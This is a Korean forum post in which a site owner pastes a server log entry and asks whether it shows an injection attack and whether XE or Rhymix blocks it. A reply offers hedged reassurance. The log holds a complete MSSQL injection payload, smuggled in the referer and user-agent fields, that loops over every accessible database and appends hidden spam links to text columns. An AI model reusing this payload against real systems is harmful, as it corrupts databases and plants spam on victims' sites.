지금 이거 해킹시도 맞죠????? 방금 연속적으로 로그기록에 이상한게 찍혔길래 복사했습니다
인터넷에서 찾아보니 인젝션공격이라고하는데 처음 보는 로그기록이라 무섭네요..
xe, 라이믹스 모두 방어기능이 되어있겠죠?
141.101.70.37 \ 404 5770 "http://google.com');declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then ''''<div style=\"display:none\">pfizer viagra coupons <a href=\"http://www.liberitutti.info/page/viagra-coupons-from-pfizer\" rel=\"nofollow\">''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''liberitutti.info'''' when 1 then ''''click'''' else ''''discount prescription coupons'''' end +''''</a> coupons for viagra 2016</div>'''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0');declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then ''''<div style=\"display:none\">pfizer viagra coupons <a href=\"http://www.liberitutti.info/page/viagra-coupons-from-pfizer\" rel=\"nofollow\">''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''liberitutti.info'''' when 1 then ''''click'''' else ''''discount prescription coupons'''' end +''''</a> coupons for viagra 2016</div>'''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--
그런 듯 하네요. XE나 라이믹스 단에서 이런 SQL을 실행이 불가능해요. 정말 불가능한 건지는 확실히 모르겠지만, FTP나 DB 서버가 뚫리지 않는 이상은 먹히지 않을 듯 하네요.